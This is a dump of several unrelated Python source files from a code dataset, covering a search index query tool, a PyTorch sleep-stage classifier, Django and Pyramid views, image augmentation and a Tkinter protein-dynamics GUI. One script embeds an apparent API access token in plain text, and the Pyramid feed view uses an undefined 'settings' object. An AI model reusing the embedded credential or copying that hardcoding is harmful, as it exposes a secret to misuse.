random.shuffle(frames_to_draw_intruder)\n        intruders = random.sample(frames_to_draw_intruder, 15)\n\n        # Is it bad if we repeat intruder words?\n        # I think so\n        for word in intruders:\n            for f2 in frame_to_draw_words:\n                if word in frame_to_draw_words[f2]:\n                    frame_to_draw_words[f2].remove(word)\n\n        j = 0\n        for i in range(0,75,5):\n            final_set = sets[i:i+5] + [intruders[j]]\n            random.shuffle(final_set)\n            samples.append((f, final_set))\n            answers.append(intruders[j])\n            j += 1\n\n\n    ordering = random.sample(range(0, len(samples)), len(samples))\n    for o in ordering:\n        print(samples[o][0], end=\";\")\n        for word in samples[o][1]:\n            print(word, end=\";\")\n        print(answers[o])\n\n\nif __name__ == \"__main__\":\n    
main()\n","sub_path":"src/frame_analysis/make_frame_tea.py","file_name":"make_frame_tea.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"214877603","text":"from pyramid.view import view_config, view_defaults\nfrom prodnet.view import ProdnetView\nfrom prodnet.models import Project, DBSession, ProjectSearch, User, Approval, Auction\nfrom prodnet.models.util import idents\nfrom sqlalchemy import not_\nfrom pyramid.httpexceptions import HTTPOk\n\n\n@view_defaults(route_name='feed', permission='user', renderer='json')\nclass FeedAPI(ProdnetView):\n @view_config(request_method='GET')\n def get(self):\n params, user = self.request.params, self.user\n\n # Results of stored searches\n get_searches = bool(params.get('searches'))\n # Results of category matching\n get_matches = bool(params.get('matches'))\n # Customer's projects\n get_customer_projects = bool(params.get('customer_projects'))\n\n num_results = int(params.get('num_results'))\n results_from = int(params.get('results_from'))\n order = params.get('order')\n\n if order == 'ending':\n order = Auction.end_date.asc()\n else:\n order = Auction.created_at.desc()\n\n baseq = DBSession.query(Project)\\\n .filter(Project.user_id != user.id)\\\n .filter(Project.state == 'running')\\\n .filter(not_(Project.id.in_(idents(user.dismissed_projects))))\n query = None\n\n # Query\n if get_searches:\n subquery = ProjectSearch.query_all(user.searches.Project.start)\\\n .filter(Project.user_id != user.id)\\\n .filter(not_(Project.id.in_(idents(user.dismissed_projects))))\n query = subquery if query is None else query.union(subquery)\n\n if get_matches:\n subquery = self.filter_categories_and_filters(baseq)\n if settings.matches_only_when_customer:\n subquery = subquery.filter(Project.user.approvals.any(\n Approval.supplier_id == user.id))\n if settings.constraint_match_distance:\n fi = user.postcode.get_filter(settings.constraint_match_distance)\n subquery = subquery.join(Project.user).join(User.postcode).filter(fi)\n query = subquery if query is None else query.union(subquery)\n\n if get_customer_projects:\n subquery = baseq.join(Project.user)\\\n .filter(User.approvals.any(Approval.supplier_id == user.id))\n if settings.only_matching_customer_projects:\n subquery = self.filter_categories_and_filters(subquery)\n query = subquery if query is None else query.union(subquery)\n\n if query is not None:\n results = query.order_by(order)[results_from:results_from+num_results]\n returns = []\n for result in results:\n returns.append(result.dictify_for_preview())\n return returns\n return []\n\n def filter_categories_and_filters(self, q):\n categories = [cat.category_id for cat in self.user.supplier_categories]\n q = q.filter(Project.category_id.in_(categories))\n for cat in self.user.supplier_categories:\n for fi in cat.filters:\n ProjectSearch.apply_filter(q, fi)\n return q\n\n @view_config(request_method='POST')\n def dismiss(self):\n project = Project.get_by_id(self.request.params['project_id'], True)\n self.user.dismissed_projects.append(project)\n return HTTPOk()","sub_path":"prodnet/views/api/feed.py","file_name":"feed.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"138799457","text":"from pymongo import MongoClient\nimport pandas as pd\nimport requests\nimport time\n\nclient = MongoClient('localhost', 27017)\ndb = client.EIX\nposts = db.collection_2\nhello = 
posts.find_one({'WIN_TOWN' : 'GREENWOOD'})\nwin_name = posts.find({'WIN_TOWN' : 'GREENWOOD'})\nlinks = []\n\n\ndef convert(con):\n    return list(set(con))\n\nfor x in win_name:\n    x = x['WIN_NAME']\n    link = 'https://api-eit.refinitiv.com/permid/search?q=' + x + '&access-token=921C3ay3X01WYghPSWasWRqinJgLBs4t&num=1'\n    links.append(link)\n\nlinks = convert(links)\n\nfor url in links:\n    # each entry in links is already a complete request URL\n    url2 = requests.get(url)\n    print(url2.status_code)\n    print(url2.url)\n","sub_path":"tranformation/PERMid.py","file_name":"PERMid.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"529717781","text":"import numpy as np\nimport imgaug.augmenters as iaa\n\nclass Augmentator:\n    \n    def __init__(\n        self,\n        rotation_range=(-5, 5),\n        width_shift_range=(-0.1, 0.1),\n        height_shift_range=(-0.1, 0.1),\n        scale_x_range=(0.77, 1.3),\n        scale_y_range=(0.77, 1.3),\n        horizontal_flip=True,\n        preprocessing_function=None,\n        seed=None\n    ):\n        self.rotation_range = rotation_range\n        self.width_shift_range = width_shift_range\n        self.height_shift_range = height_shift_range\n        self.scale_x_range = scale_x_range\n        self.scale_y_range = scale_y_range\n        self.horizontal_flip = horizontal_flip\n        self.preprocessing_function = preprocessing_function\n        self.seed = seed\n    \n    def augment(self, frame_sequence):\n        if self.seed is not None:\n            rs = np.random.RandomState(self.seed)\n        else:\n            rs = np.random\n        rotate = rs.randint(self.rotation_range[0], self.rotation_range[1] + 1)\n        translate_percent = {\n            'x': rs.uniform(self.width_shift_range[0], self.width_shift_range[1]),\n            'y': rs.uniform(self.height_shift_range[0], self.height_shift_range[1])\n        }\n        scale = {\n            'x': rs.uniform(self.scale_x_range[0], self.scale_x_range[1]),\n            'y': rs.uniform(self.scale_y_range[0], self.scale_y_range[1])\n        }\n        affine = iaa.Affine(\n            rotate=rotate,\n            translate_percent=translate_percent,\n            scale=scale,\n        )\n        horizontal_flip = iaa.Fliplr(1)\n        aug_sort_flg = rs.randint(0, 2)\n        if aug_sort_flg:\n            aug = [affine, horizontal_flip]\n        else:\n            aug = [horizontal_flip, affine]\n        seq = iaa.Sequential(aug)\n        aug_sequence = seq(images=frame_sequence)\n        if self.preprocessing_function is not None:\n            aug_sequence = np.array(list(map(self.preprocessing_function, aug_sequence)))\n        return aug_sequence","sub_path":"DenseNet121_Conv2D_GRU/src/augmentator.py","file_name":"augmentator.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
+{"seq_id":"178966188","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 10 08:39:11 2019\n\n@author: Conma\n\"\"\"\n\n\"\"\"\n***********************************************************************\n * File: hw02_k_fold.py\n * Name: Connor H. McCurley\n * Date: 2019-09-21\n * Desc: Provides coded solutions to homework set 02 of EEL681,\n *        Deep Learning, taught by Dr. 
Jose Principe, Fall 2019.\n**********************************************************************\n\"\"\"\n\n######################################################################\n######################### Import Packages ############################\n######################################################################\nimport os\nimport copy\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nimport matplotlib.colors\nimport sklearn.model_selection as ms\nimport sklearn.metrics as metrics\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.utils.multiclass import unique_labels\n\n\n\n######################################################################\n##################### Function Definitions ###########################\n######################################################################\n \ndef readData(dataFilePath, labelFilePath, skipHeader):\n \"\"\"\n ******************************************************************\n * Func: readData()\n * Desc: Reads data from a .asc file\n * Inputs:\n * Outputs: \n ******************************************************************\n \"\"\"\n X = np.loadtxt(dataFilePath, skiprows=skipHeader)\n y = np.loadtxt(labelFilePath, skiprows=skipHeader)\n \n return X, y\n\n \ndef plot_confusion_matrix(y_true, y_pred, classes, totalLoss, normalize=False, title=None, cmap=plt.cm.Blues):\n \n \"\"\"\n ******************************************************************\n * Func: plot_confusion_matrix()\n * Desc: This function was borrowed from scikit-learn.org\n * Inputs:\n * Outputs: \n ******************************************************************\n \"\"\"\n\n if not(title):\n if normalize:\n title = 'Normalized confusion matrix'\n else:\n title = 'Confusion matrix, without normalization'\n \n # Compute confusion matrix\n cm = confusion_matrix(y_true, y_pred)\n # Only use the labels that appear in the data\n# classes = classes[unique_labels(y_true, y_pred)]\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print(f'Confusion matrix \\n Test Loss: {totalLoss}')\n \n print(cm)\n \n fig, ax = plt.subplots()\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n ax.figure.colorbar(im, ax=ax)\n # We want to show all ticks...\n ax.set(xticks=np.arange(cm.shape[1]),\n yticks=np.arange(cm.shape[0]),\n # ... 
and label them with the respective list entries\n           xticklabels=classes, yticklabels=classes,\n           title='Confusion matrix \\n Test Loss: %.2f' % totalLoss,\n           ylabel='True label',\n           xlabel='Predicted label')\n    \n    # Rotate the tick labels and set their alignment.\n    plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n             rotation_mode=\"anchor\")\n    \n    # Loop over data dimensions and create text annotations.\n    fmt = '.2f' if normalize else 'd'\n    thresh = cm.max() / 2.\n    for i in range(cm.shape[0]):\n        for j in range(cm.shape[1]):\n            ax.text(j, i, format(cm[i, j], fmt),\n                    ha=\"center\", va=\"center\",\n                    color=\"white\" if cm[i, j] > thresh else \"black\")\n    fig.tight_layout()\n    \n    return ax\n\n###################### Define Neural Net Class #######################\nclass Feedforward(torch.nn.Module):\n    \n    def __init__(self, input_size, hidden_size, output_size):\n        super(Feedforward, self).__init__()\n        self.input_size = input_size\n        self.hidden_size = hidden_size\n        self.output_size = output_size\n        self.relu = torch.nn.ReLU()\n        \n        # two hidden layers (5 and 10 units) feed the output layer;\n        # hidden_size is kept in the signature for compatibility\n        self.hidden_1_size = 5\n        self.hidden_2_size = 10\n        self.fc3 = torch.nn.Linear(self.input_size, self.hidden_1_size)\n        self.fc4 = torch.nn.Linear(self.hidden_1_size, self.hidden_2_size)\n        self.fc5 = torch.nn.Linear(self.hidden_2_size, self.output_size)\n#        self.sigmoid = torch.nn.Sigmoid()\n    \n    def forward(self, x):\n        hidden = self.fc3(x)\n        relu = self.relu(hidden)\n        h2 = self.fc4(relu)\n        relu = self.relu(h2)\n        output = self.fc5(relu)\n#        output = self.sigmoid(output)\n        return output\n\n\n######################################################################\n############################## Main ##################################\n######################################################################\nif __name__== \"__main__\":\n    \n    print('Running Main...')\n    \n    ####################### Set Parameters ###########################\n    parameters = dict()\n    parameters[\"hiddenSize\"] = 10\n    parameters[\"outputSize\"] = 6\n    parameters[\"learningRate\"] = 0.01\n    parameters[\"numEpochs\"] = 10000\n    parameters[\"numTrials\"] = 10\n    parameters[\"validationSize\"] = 0.2\n    parameters[\"testSize\"] = 0.2\n    parameters[\"labels\"] = ['Stage 1', 'Stage 2', 'Stage 3', 'Stage 4', 'Stage 5', 'Awake']\n    parameters[\"updateIter\"] = 200 \n    parameters[\"numFolds\"] = 5\n    \n    ####################### Import data ##############################\n    print('Loading data...')\n    cwd = os.getcwd()\n    \n    # import data from patient 1\n    dataFilePath = '../Data/Sleepdata1 Input.asc'\n    labelFilePath = '../Data/Sleepdata1 Desired.asc'\n    skipHeader = 1\n    X_p1,y_p1 = readData(dataFilePath, labelFilePath, skipHeader)\n    y_p1 = np.argmax(y_p1,axis=1) # convert from one-hot to index\n    \n    # import data from patient 2\n    dataFilePath = '../Data/Sleepdata2 Input.asc'\n    labelFilePath = '../Data/Sleepdata2 Desired.asc'\n    skipHeader = 1\n    X_p2,y_p2 = readData(dataFilePath, labelFilePath, skipHeader)\n    y_p2 = np.argmax(y_p2,axis=1) # convert from one-hot to index\n    \n    # combine data from both patients\n    X_all = np.concatenate((X_p1,X_p2))\n    y_all = np.concatenate((y_p1,y_p2))\n\n    ################### Define Training/Test Subset ##################\n\n    # partition data into training and test sets\n    X, X_test, y, y_test = ms.train_test_split(X_all, y_all, test_size=parameters[\"testSize\"], random_state=42)\n    \n    # convert data into torch 
format\n    X_test = torch.FloatTensor(X_test)\n    y_test = torch.LongTensor(y_test)\n    \n    #################### Define Training Folds #######################\n    kf = KFold(n_splits=parameters[\"numFolds\"], random_state=42, shuffle=True)\n    kf.get_n_splits(X)\n    \n    iteration = 1\n    for train_index, test_index in kf.split(X):\n        print(f'Fold: {iteration}')\n#        print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n        X_train, X_val = X[train_index], X[test_index]\n        y_train, y_val = y[train_index], y[test_index]\n        \n        # convert data into torch format\n        X_train = torch.FloatTensor(X_train)\n        y_train = torch.LongTensor(y_train)\n        X_val = torch.FloatTensor(X_val)\n        y_val = torch.LongTensor(y_val)\n        \n        ############# run a number of trials, save best model ############\n        for trial in range(parameters[\"numTrials\"]):\n            \n            learningCurve = []\n            valLearningCurve = []\n            \n            ####################### Define Network ###########################\n            inputSize = X_p1.shape[1]\n            \n            # instantiate model\n            model = Feedforward(inputSize, parameters[\"hiddenSize\"], parameters[\"outputSize\"])\n            \n            # define loss function\n            criterion = torch.nn.CrossEntropyLoss()\n            \n            # define optimizer (stochastic gradient descent)\n            optimizer = torch.optim.SGD(model.parameters(), parameters[\"learningRate\"])\n            \n            ##################### Train the Network ##########################\n            \n            model.train()\n            \n            ################# train a single network #####################\n            for epoch in range(parameters[\"numEpochs\"]):\n                \n                #set gradients to zero\n                optimizer.zero_grad()\n                \n                # forward pass\n                y_pred = model(X_train) # predict output vector\n                \n                # compute loss\n                loss = criterion(y_pred, y_train)\n                \n                if not(epoch % parameters[\"updateIter\"]):\n                    learningCurve.append(loss)\n                    model.eval()\n                    valLearningCurve.append(criterion(model(X_val),y_val))\n                    model.train()\n                    \n                    # if the validation loss starts increasing, stop training\n                    # (compare the sign against 0: np.sign() alone is also truthy for -1)\n                    if ((epoch > 4000) and (np.sign(valLearningCurve[-1].detach().numpy() - valLearningCurve[-2].detach().numpy()) > 0)):\n                        break\n                \n                if not(epoch % 500):\n                    print('Epoch {}: train loss: {}'.format(epoch, loss.item()))\n                \n                # backward pass\n                loss.backward() # computes the gradients\n                optimizer.step() # updates the weights\n                \n            if ((iteration == 1) and (trial==0)):\n                best_model = dict()\n                best_model[\"modelParameters\"] = copy.deepcopy(model.state_dict())\n                best_model[\"learningCurve\"] = learningCurve\n                best_model[\"valLearningCurve\"] = valLearningCurve\n                best_model[\"numEpochs\"] = epoch\n                best_model[\"validationLoss\"] = valLearningCurve[-1]\n            else:\n                # keep the trial with the lowest validation loss\n                if (valLearningCurve[-1] < best_model[\"validationLoss\"]):\n                    best_model[\"modelParameters\"] = copy.deepcopy(model.state_dict())\n                    best_model[\"learningCurve\"] = learningCurve\n                    best_model[\"valLearningCurve\"] = valLearningCurve\n                    best_model[\"numEpochs\"] = epoch\n                    best_model[\"validationLoss\"] = valLearningCurve[-1]\n        iteration = iteration + 1\n    \n    ######################### Learning Curve ##########################\n    \n    # retrieve optimal parameters\n    learningCurve = best_model[\"learningCurve\"]\n    valLearningCurve = best_model[\"valLearningCurve\"]\n    \n    # plot the learning curve\n    plt.figure()\n    plt.plot(parameters[\"updateIter\"]*np.arange(0,len(learningCurve),1),learningCurve, c='blue')\n    plt.plot(parameters[\"updateIter\"]*np.arange(0,len(valLearningCurve),1),valLearningCurve, c='orange')\n    plt.title(\"Learning Curve\", fontsize=18)\n    plt.xlabel('Iteration', fontsize=12)\n    plt.ylabel('Cross-Entropy Loss', fontsize=12)\n    plt.legend(['Training', 
'Validation'])\n#    plt.savefig('C:\\\\Users\\\\Conma\\\\Desktop\\\\HW01\\\\Report\\\\Images\\\\Q2_learning_curve_exact.jpg')\n#    plt.close()\n    \n\n    \n    \n    ####################### Confusion Matrix #########################\n    \n    # revert model back to best performing\n    model.load_state_dict(best_model[\"modelParameters\"])\n    model.eval()\n    \n    # predict state labels\n    y_test_pred = model(X_test)\n    values, y_test_pred_index = y_test_pred.max(1)\n    \n    # compute the loss\n    testLoss = criterion(y_test_pred, y_test)\n    \n    testLoss = testLoss.detach().numpy()\n    testLoss = np.round(testLoss,2)\n    \n    # plot the confusion matrix\n    plot_confusion_matrix(y_test.detach().numpy(), y_test_pred_index.detach().numpy(), parameters[\"labels\"], testLoss, normalize=False, title='Confusion Matrix of Sleep \\n States')\n\n    \n\n    \n    \n    print('================ DONE ================')\n\n","sub_path":"Homework/HW02/Code/hw02_k_fold.py","file_name":"hw02_k_fold.py","file_ext":"py","file_size_in_byte":12359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
+{"seq_id":"621877697","text":"import pickle\nimport sys\nimport subprocess as sp\n\nclass InvalidQueryException(Exception):\n    pass\n\n\ndef merge_lists(list_1, list_2):\n    i_1 = 0\n    i_2 = 0\n    result = []\n    while i_1 < len(list_1) and i_2 < len(list_2):\n        elem_1 = list_1[i_1][0]\n        elem_2 = list_2[i_2][0]\n        if elem_1 == elem_2:\n            result.append(list_2[i_2])\n            i_1 += 1\n            i_2 += 1\n        elif elem_1 < elem_2:\n            result.append(list_1[i_1])\n            i_1 += 1\n        else:\n            result.append(list_2[i_2])\n            i_2 += 1\n    if i_1 < len(list_1):\n        result += list_1[i_1:]\n    if i_2 < len(list_2):\n        result += list_2[i_2:]\n    return result\n\n    \ndef intersect_lists(list_1, list_2):\n    i_1 = 0\n    i_2 = 0\n    result = []\n    while i_1 < len(list_1) and i_2 < len(list_2):\n        elem_1 = list_1[i_1][0]\n        elem_2 = list_2[i_2][0]\n        if elem_1 == elem_2:\n            result.append(list_2[i_2])\n            i_1 += 1\n            i_2 += 1\n        elif elem_1 < elem_2:\n            i_1 += 1\n        else:\n            i_2 += 1\n    return result\n\ndef iterate_positions(list_1, list_2, range):\n    res_p = []\n    try:\n        it_1 = iter(list_1)\n        it_2 = iter(list_2)\n        pos_1 = next(it_1)\n        pos_2 = next(it_2)\n        while True:\n            while pos_1 > pos_2:\n                if abs(pos_1 - pos_2) <= range:\n                    res_p.append(pos_1)\n                pos_2 = next(it_2)\n            pos_1 = next(it_1)\n    except StopIteration:\n        pass\n    return res_p\n\ndef intersect_with_range(list_1, list_2, range):\n    direction = 1 if range[0] == '+' else (-1 if range[0] == '-' else 0)\n    range = abs(int(range))\n    i_1 = 0\n    i_2 = 0\n    result = []\n    while i_1 < len(list_1) and i_2 < len(list_2):\n        elem_1 = list_1[i_1][0]\n        elem_2 = list_2[i_2][0]\n        if elem_1 == elem_2:\n            res_p = []\n            if direction <= 0:\n                res_p.extend(iterate_positions(list_1[i_1][1], list_2[i_2][1], range))\n            if direction >= 0:\n                res_p.extend(iterate_positions(list_2[i_2][1], list_1[i_1][1], range))\n            if res_p:\n                result.append( (elem_1, res_p) )\n            i_1 += 1\n            i_2 += 1\n        elif elem_1 < elem_2:\n            i_1 += 1\n        else:\n            i_2 += 1\n    return result\n\n    \ndef normalize_word(word, normalizer = '.\\\\mystem.exe'):\n    p = sp.Popen([normalizer, '-l'], stdin = sp.PIPE, stdout = sp.PIPE)\n    stdout, stderr = p.communicate(word.encode())\n    p.kill()\n    return [w.strip('?{}') for w in stdout.decode().split('|')]\n\n\ndef get_full_list(word, index):\n    forms = normalize_word(word)\n    lists = [index[form] for form in forms if form in index]\n    result = {}\n    for li in lists:\n        for name, pos in li:\n            if name not in result:\n                result[name] = set()\n            result[name].update(pos)\n    ret = [(name, 
sorted(list(result[name]))) for name in result]\n    ret.sort(key = lambda x: x[0])\n    return ret\n\n\ndef process_query(index, query):\n    result = []\n    last_op = 'x'\n    last_word = ''\n    \n    items = query.split()\n    items = list(map(lambda x : x.lower(), items))\n    is_op = False\n    \n    for i, item in enumerate(items):\n        if is_op:\n            if (not item or (not (item in ['and', 'or']) and item[0] != '\\\\') or \n                ((item == 'and' or item[0] == '\\\\') and last_op == 'or') or \n                (item == 'or' and (last_op == 'and' or last_op[0] == '\\\\'))):\n                raise InvalidQueryException\n            last_op = item\n        else:\n            full_list = get_full_list(item, index)\n            # compare positions rather than values so a repeated first word works\n            if i == 0:\n                result = full_list\n            else:\n                if last_op == 'or':\n                    result = merge_lists(result, full_list)\n                elif last_op == 'and':\n                    result = intersect_lists(result, full_list)\n                elif last_op[0] == '\\\\':\n                    result = intersect_with_range(result, full_list, last_op[1:])\n        is_op = not is_op\n    \n    return [res[0] for res in result]\n\nif __name__ == '__main__':\n    if len(sys.argv) != 2:\n        print(\"Invalid command line arguments. Example: python searcher.py <index_file>\")\n        sys.exit()\n    index_file = sys.argv[1]\n    index = pickle.load(open(index_file, 'rb'))\n    \n    query = input('Input query: ')\n    while query.lower() != 'exit':\n        try:\n            res = process_query(index, query)\n            for item in res:\n                print(item)\n            print('Matches: ' + str(len(res)))\n        except InvalidQueryException:\n            print('Invalid query. Try again...')\n        query = input('Input query: ')","sub_path":"searcher.py","file_name":"searcher.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
+{"seq_id":"353768674","text":"from django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django import forms\nfrom django.core.mail import send_mail\nfrom django.template.loader import render_to_string\n\nfrom .models import CustomUsuario\n\n\nclass CustomUsuarioCriarForm(UserCreationForm):\n    class Meta:\n        model = CustomUsuario\n        fields = ('username', 'first_name', 'last_name', 'matricula')\n        labels = {'username': 'Username/E-mail'}\n\n    def save(self, commit=True):\n        user = super().save(commit=False)\n        user.set_password(self.cleaned_data[\"password1\"])  # retrieve the data to encrypt the password\n        user.email = self.cleaned_data[\"username\"]  # retrieve the data for the e-mail address\n\n        if commit:\n            user.save()\n            data = {'usuario': user,}\n            plain_text = render_to_string('accounts/emails/email.txt', data)\n            html_email = render_to_string('accounts/emails/email.html', data)\n            send_mail(\"Sigo - Seja Bem Vindo!\",\n                      plain_text,\n                      \"sigoorientacoes@gmail.com\",\n                      ['{0}'.format(user)],\n                      html_message=html_email\n                      )\n        return user\n\n\nclass CustomUsuarioChangeForm(UserChangeForm):\n    class Meta:\n        model = CustomUsuario  # assignment, not an annotation, so the ModelForm sees the model\n        fields = ('first_name', 'last_name')\n","sub_path":"accounts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"384461779","text":"\"\"\"\nInterface Module:\nThis module is part of the PyEDA program. It provides several classes to use\nPyEDA with a graphical Interface using Tkinter. 
It also acts as a main script\nto drive the EDA analyses.\n\nClasses:\n    EDA_app -> It is the main window where all the other frames are projected.\n        inherited from tkinter.Tk.\n    StartPage -> Is the first frame the user sees after the execution of PyEDA.\n        It leads to the loading data frame or the \"about us\" page.\n        inherited from tkinter.Frame\n    initial_root -> Acts as a loading data frame. Is where the user interacts\n        with the program by entering the required data and options.\n        inherited from tkinter.Frame\n    waiting_window -> Is where the analysis is taking place. Incorporates the\n        same steps as the PyEDA.py CLI. Leads to the plotting frame.\n    plot_window -> It shows buttons to the different plotting capabilities of\n        the software. It integrates matplotlib in the Tkinter window.\n\"\"\"\n\nimport tkinter\nfrom tkinter import ttk\nimport os.path\nimport os\nimport sys\nfrom tkinter import filedialog\nfrom . import helper_module as mdl\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg\nimport Bio.PDB as pdb\nfrom . import edanalysis as eda\n\n\n# implement the default mpl key bindings\n\n\nTITLE_FONT = (\"Helvetica\", 18, \"bold\")\ntext_fornt = (\"Courier\", 14)\n###############################################################################\nclass EDA_app(tkinter.Tk):\n    \"\"\"\n    It is the Tk window. It has the title information and it keeps the app_data dictionary where the\n    different frames can share data. It also has a method to switch between\n    frames. This is useful to maintain a program-like experience.\n\n    Methods:\n        show_frame -> It's the only method in this class and it is used to\n            switch to a specific frame from wherever the user is.\n\n    Attributes:\n        self.app_data -> It is the data hub for the whole application. It is where\n            the data is kept when switching from frame to frame\n        self.title -> It sets the title of the application.\n        self.frames -> It is a dictionary that contains the frame instances all\n            preloaded from the beginning. It is used by the show_frame method to\n            get redirection to specific frames.\n    \"\"\"\n    def __init__(self, *args, **kwargs):\n        \"\"\"Constructor\"\"\"\n        tkinter.Tk.__init__(self, *args, **kwargs)\n        self.app_data = {\"filename\": '',\n                         \"pdbid\": '',\n                         \"plot\": '',\n                         \"pdbfilename\": '',\n                         \"pathname\": '',\n                         \"atom\": '',\n                         \"mode\": '',\n                         \"pathplots\": '',\n                         \"RMSD_plot\": ''}\n        # the container is where we'll stack a bunch of frames\n        # on top of each other, then the one we want visible\n        # will be raised above the others\n        self.title(\"PyEDA: by JF Gilabert & D Mas\")\n        #self.geometry(\"600x600\")\n        container = tkinter.Frame(self)\n        container.pack(side=\"top\", fill=\"both\", expand=True)\n        container.grid_rowconfigure(0, weight=1)\n        container.grid_columnconfigure(0, weight=1)\n\n        self.frames = {}\n        for F in (StartPage, initial_root, waiting_window, About_EDA, \\\n                  plot_window):\n            page_name = F.__name__\n            frame = F(container, self)\n            self.frames[page_name] = frame\n            frame.grid(row=0, column=0, sticky=\"nsew\")\n\n\n        self.show_frame(\"StartPage\")\n\n    def show_frame(self, page_name):\n        \"\"\"Show a frame for the given page name\"\"\"\n        frame = self.frames[page_name]\n        frame.tkraise()\n\n\n###############################################################################\nclass StartPage(tkinter.Frame):\n    \"\"\"\n    It is the starting page. 
It displays brief information about the program,\n    and it lets the user go to the analysis or the \"about us\" page.\n\n    Methods:\n        No methods implemented\n\n    Attributes:\n        self.controller -> It is a reference to the main Tk window.\n    \"\"\"\n\n    def __init__(self, parent, controller):\n        \"\"\"\n        Frame Constructor. We use the controller attribute to refer to the\n        Tk window that is \"controlling\" this frame. This way it can access\n        the main window methods.\n        \"\"\"\n        tkinter.Frame.__init__(self, parent)\n        self.controller = controller\n        title = tkinter.Label(self, text=\"Welcome to the ED Analyser.\",\n                              font=(\"Helvetica\", 25))\n        title.grid(row=1, column=0, columnspan=3)\n        path_to_img = os.path.dirname(os.path.realpath(__file__))\n        photo = tkinter.PhotoImage(file=path_to_img+\"/image.gif\")\n        w = tkinter.Label(self, image=photo)\n        w.photo = photo\n        w.grid(row=0, column=0, columnspan=3)\n        subtitle = tkinter.Label(self, text=\"\"\"\n    This Software is the result of a project of Structural Bioinformatics\n    and Introduction to Python from the Master of Science in Bioinformatics\n    at Universitat Pompeu Fabra. We use the Essential Dynamics approach\n    in order to analyse the Normal Modes of NMR structures and Molecular\n    Dynamics. The input format is pdb although it can be also retrieved\n    automatically by the software.\n    \"\"\", font=text_fornt, justify=tkinter.LEFT)\n        subtitle2 = tkinter.Label(self, text=\"Authors: JF Gilabert & D Mas\",\\\n            font=(\"Helvetica\", 22, \"bold\"))\n        subtitle2.grid(row=2, column=0, columnspan=3)\n        subtitle.grid(row=3, column=0, columnspan=3)\n\n\n        button1 = tkinter.Button(self, text=\"Start the Analysis\",\n                                 command=lambda: controller.show_frame(\"initial_root\"))\n        button2 = tkinter.Button(self, text=\"About PyEDA\",\n                                 command=lambda: controller.show_frame(\"About_EDA\"))\n        button3 = tkinter.Button(self, text=\"Close App\", command=self.quit)\n        button1.grid(row=5, column=0)\n        button2.grid(row=5, column=1)\n        button3.grid(row=5, column=2)\n\n\n\n################################################################################\n\nclass initial_root(tkinter.Frame):\n    \"\"\"\n    This is the initial page of the application where the files are loaded and\n    where the options can be selected.\n\n    Methods:\n        select_a -> It shows a message with the atom chosen\n        select_m -> It shows a message with the mode chosen\n        check_uniprot_accession_code -> Checks if the code has len==4\n        get_pdb -> pass on the pdb code and move the user to the waiting_window\n        select_file -> pass on the pdb filename and move the user\n            to the waiting_window\n\n    Attributes:\n        self.controller -> It is a reference to the main Tk window.\n        self.entry_var -> to let the user enter a pdb code\n        self.labels -> to display the method chosen in the radio buttons\n        self.m -> to pass on the mode chosen\n        self.var -> to pass on the atoms chosen\n    \"\"\"\n    def __init__(self, parent, controller):\n        \"\"\"\n        Frame Constructor. We use the controller attribute to refer to the\n        Tk window that is \"controlling\" this frame. 
This way it can access\n        the main window methods.\n        There are diverse types of buttons used to load the data.\n        \"\"\"\n        tkinter.Frame.__init__(self, parent)\n        self.controller = controller\n        ### title\n        title = tkinter.Label(self, text=\"Welcome to the ED Analyser.\",\n                              font=(\"Helvetica\", 25), justify= \"center\")\n        title.grid(row=1, column=0, columnspan=5)\n        ### photo\n        path_to_img = os.path.dirname(os.path.realpath(__file__))\n        photo = tkinter.PhotoImage(file=path_to_img+\"/image.gif\")\n        w = tkinter.Label(self, image=photo)\n        w.photo = photo\n        w.grid(row=0, column=0, columnspan=5)\n        ### subtitle\n        subtitle = tkinter.Label(self, text=\"Enter a file or a pdb code:\", \\\n            font=(\"Helvetica\", 20))\n        subtitle2 = tkinter.Label(self, text=\"Parameters:\", \\\n            font=(\"Helvetica\", 20))\n        subtitle.grid(row=2, column=0, columnspan=2)\n        subtitle2.grid(row=2, column=2, columnspan=3)\n        ### pdb code entry\n        self.entry_var = tkinter.StringVar()\n        ### entry\n        label = tkinter.Label(self, text=\"pdb code:\",\n                              font=(\"Helvetica\", 15))\n        label.grid(row=3, column=0)\n        self.entry = tkinter.Entry(self, bd=2, width=5, \\\n            textvariable=self.entry_var)\n        self.entry.grid(row=4, column=0)\n        ### check button\n        b = tkinter.Button(self, text=\"Check\",\n                           command=self.check_uniprot_accession_code)\n        b.grid(row=5, column=0)\n        ### get pdb button\n        get = tkinter.Button(self, text=\"Get PDB\", command=self.get_pdb)\n        get.grid(row=6, column=0, columnspan=2)\n        ### add a file button\n        add = tkinter.Button(self, text=\"Add a pdb file\", \\\n            command=self.select_file)\n        add.grid(row=4, column=1, rowspan=2)\n\n        label4 = tkinter.Label(self, text=\"Go Back:\",\n                               font=(\"Helvetica\", 15))\n        label4.grid(row=7, column=0, 